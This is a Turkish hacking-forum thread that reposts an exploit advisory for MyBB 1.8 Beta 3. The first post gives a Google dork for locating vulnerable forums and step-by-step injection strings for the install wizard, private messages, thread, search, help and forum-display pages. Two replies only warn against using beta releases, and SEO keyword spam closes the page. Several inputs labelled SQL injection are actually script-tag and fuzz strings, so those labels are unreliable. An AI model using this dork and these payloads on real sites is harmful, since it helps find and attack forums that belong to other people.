Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı
#1
Kod:
# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
Now let's finish setup and go to the homepage.


b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example:localhost/private.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


c) SQL Injection in Showthread
Go to -> Show Thread, for example:localhost/showthread.php?tid=1
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


d) SQL Injection in Search
Go to -> Search, for example:localhost/search.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


e) SQL Injection in Help Documents
Go to -> Help Documents, for example:localhost/misc.php?action=help
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload


f) SQL Injection in Forum Display
Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/34381/
www.deccal.org


Beğenenler: '[D3F@C4R]
#2
H4CK4L ında bir sözü vardı, yeni çıkan bir şeyi hemen kullanmamak lazım her çıkan güncellemeyi yapmamak lazım diye. +
Beğenenler:
#3
Stabili varken aksiyorn aramayın betalarda kiss
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler: KingSkrupellos

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Quarter Theme - Quarter MyBB Teması ! Cyberizm ÖZEL ElitHacker 60 4,293 04-12-2016, Saat: 01:56
Son Yorum: Süleyman.x
  MyBB Zamunda Torrent Teması JTatar 8 358 01-12-2016, Saat: 10:36
Son Yorum: ZoMaX
  Ücretsiz Candy Theme MyBB 1.6.x ElitHacker 36 3,248 01-12-2016, Saat: 10:35
Son Yorum: ZoMaX
  Enayiler RedTurk.Org MyBB Tema ve İkon Arşivi İndir AntiChristX 7 160 01-12-2016, Saat: 10:17
Son Yorum: ZoMaX
  [1.8] Supreme Mybb Teması CyberAngel 16 705 08-11-2016, Saat: 22:22
Son Yorum: BordoKlavyeli
Anahtar Kelimeler

MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı indir, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Videosu, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Online izle, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Bedava indir, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Yükle, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Hakkında, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Nedir, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Free indir, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Oyunu, MyBB 1.8 Beta 3 - CSS & SQL Injection Açığı Download


1 Ziyaretçi